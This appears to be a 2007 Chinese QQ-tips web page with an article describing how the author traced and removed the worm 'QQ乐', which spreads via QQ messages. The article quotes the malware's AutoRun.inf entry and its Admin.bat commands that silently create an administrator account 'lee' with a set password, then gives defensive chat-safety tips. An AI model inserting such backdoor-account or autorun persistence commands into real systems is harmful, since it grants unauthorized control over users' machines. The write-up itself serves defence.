回首页 ◎ 设为首页  
收藏到QQ书签  
◎ 联系我们  
首 页  QQ资讯  QQ空间代码  QQ签名|资料  QQ头像  FLASH|FD模块  QQ表情  QQ下载  QQ空间日志  QQ网友宝典  QQ网名  
QQ新闻资讯栏目导航>>免费Q币(各类优惠活动)QQ新闻QQ技巧QQ安全QQ网页传情QQ在线工具
  当前位置:首 页 >> QQ资讯 >> QQ安全 >> 抓住QQ的“小尾巴”—另类自启动病毒攻防
最 新 推 荐
免费获取QQ币的网站-QQ王..推荐
花钱买的QQ号码申诉技巧..推荐
08年最新利用QQ空间提示..推荐
QQ密保卡为安全保驾护航推荐
揭露最新盗QQ密码骗术—..推荐
防止QQ密码被破解的技巧[..推荐
QQ惊爆危险漏洞,360截获..推荐
关于对误传QQ存在漏洞传..推荐
邀请你参加游戏陷阱:小心..推荐
QQ密码保护卡即日推出推荐
安全第一 邮箱今天你上锁..推荐
腾讯提醒用户谨防QQ号被..推荐
保护QQ,专家教你聊天防盗..推荐
AVAST杀毒软件误报QQGAME..推荐
qq密码保护DNA预设全面开启推荐
网友恶搞发“腾讯网络通..推荐
利用QQLive,新型QQ尾巴..推荐
病毒“帕虫”来袭 可破坏..推荐
QQ聊天避开木马病毒攻击..推荐
抓住QQ的“小尾巴”—另..推荐
QQ骗术-假冒腾讯网站,骗..推荐
黑客遥控摄像头窥隐私推荐
从QQ被盗说起 让PC确保安..推荐
防守也要反击:彻底粉碎Q..推荐
艾瑞:腾讯QQ渗透即时通..推荐
Q币交易存在监管隐患 中..推荐
和一个骗子的1小时聊天记..推荐
热点看台推荐文章

热 门 文 章
死保号升级为第二代密码..
揭露最新盗QQ密码骗术—..推荐
QQ又出新的漏洞 涉及所有..推荐
QQ软件信息:腾讯旗下支..
关于登入QQ要输入验证码..
获取暴利黑客自曝偷QQ号..
利用Hosts文件防止QQ病毒
QQ密码保护卡即日推出推荐
QQ骗术-假冒腾讯网站,骗..推荐
黑客遥控摄像头窥隐私推荐
关键词

搜索方式

搜索范围

精确匹配
抓住QQ的“小尾巴”—另类自启动病毒攻防 来源:QQ王国空间站
提示:点击右边的收藏到QQ书签就不怕下次找不到这篇文章了! 将本文收藏到QQ书签中,以便日后查看或与好友分享
发布于2007-05-30 09:57 被读193次 【字体:

笔者最近遇到一个采取另类方式启动的病毒――QQ乐(Worm/QQMsg.Lee),现把一波三折的查杀过程和一些经验写出来,供朋友们参考。

某日在QQ里连续收到一位朋友发来的消息,该消息中都带 
有一串网址,经证实并不是他主动发来的,于是怀疑他的电脑中了病毒。笔者首先打开金山网镖防火墙,检查发现一个正在访问网络的可疑程序“System32.exe”,通过名字可以看出它是想与System32文件夹相混淆,于是点击右上角的“结束进程”杀掉它。然后按图索骥到C盘根目录下找到并删除它,接着打开了注册表编辑器。因为一般木马和病毒都喜欢在这里添加自启动键值,但是检查了所有以RUN为开头的项都没有与这个文件相关联的启动项,看来这个病毒十分狡猾。

接着在资源管理器中检查Win.ini和System.ini,因为有些病毒会在Win.ini中的[Windows]小节下的load和run字段后面,以及System.ini中的[boot]小节的Shell=Explorer.exe后面添加启动项,以便每次开机时自动运行。谁知这些地方仍然一无所获,不过却意外发现系统中多出了一个管理员账户“Lee”,怀疑是病毒添加的,于是删除它。

正在笔者为找不到毒源而纳闷时,进程中又重新出现了病毒文件“System32.exe”,而且被删除的账户也重新恢复。看来如果不找到病毒的启动机制,就难以彻底制服它。于是笔者打开“搜索”,在“文件中的一个字或词组”(这里可以搜索文件内部的内容)一栏中输入“System32.exe”,经过一番等待,在搜索结果中发现了数个“AutoRun.inf”文件,用记事本打开它,内容为:

  [autorun]

  open=System32.exe

原来病毒自启动的根源在这儿。感染病毒后它会在每个分区的根目录下创建Autorun.inf文件和病毒体System32.exe、System32dll.dll,使得每次双击盘符打开时病毒都会自动运行(原理与自启动光盘相同),这种方法确实比在注册表中添加启动项更不容易被发现。笔者接着又利用前面的搜索方法,查找“Lee”这个关键字,结果发现了一个自动创建管理员账户的批处理文件“Admin.bat”。用记事本打开它,内容如下:

  net user lee abcd1234!@# /add

  net localgroup administrators lee /add

通过内容可以看出病毒是要增加一个名为lee,密码为abcd1234!@#的新账户,然后将它加入管理员组中(即赋予管理员权限)。毒根找到了,下面就可以大开“杀戒”了,把找到的这些文件统统删除。

IM病毒防范技巧:

1. 用QQ等即时通讯工具聊天时,除了开启病毒和网络防火墙以外,还要打开嵌入式防火墙,例如金山毒霸6中的“腾讯QQ、MSN Messenger、ICQ安全助手”。至少要把金山网镖等防火墙的安全级别设置到中以上,才能更有效拦截木马程序和网络攻击。

2. 不要随意点击QQ中的链接,因为许多病毒都会伪装成网页链接,并通过消息中具有欺骗和诱惑的文字让你去点击,例如QQ小尾巴。


最新QQ空间免费个人形象非主流系列(180款) 


相关专题QQ技术
批量删除QQ好友的好方法(无需任何软件)
最新的奥运图标的点亮方法详细介绍
怎样点亮[QQ直播]QQLive图标?-QQ王国教您!
右键添加QQ表情消失的找回方法
警惕:假QQ帐号服务中心日前创建
如何让网站变成黑色-全国哀悼日
QQ号码被盗-QQ币被盗过程,希望大家多加小心
30秒清除你电脑中的垃圾(使你电脑急速如飞)
打开QQ空间弹出输入网络密码窗口的原因
2月14日QQ空间免费皮肤代码(可用)

上一篇:QQ骗术-假冒腾讯网站,骗取浏览量
下一篇:利用Hosts文件防止QQ病毒

共有评论 0 条 网友评分 0分 查看全部

【发表评论】 评分:1分 2分 3分 4分 5分
用户名: 密码: [注册]

QQ新闻栏目提供:最新官方信息,最新免费QQ币,免费QQ秀,各类优惠活动。同样也提供QQ技巧,QQ安全等内容。

QQ空间地图导航 - 设为首页 - 收藏QQ王国到本地 - 收藏到QQ书签 - 给QQ王国空间站网提意见 QQ:980295
QQ空间王国网 © 2007-2008 苏ICP备07023894号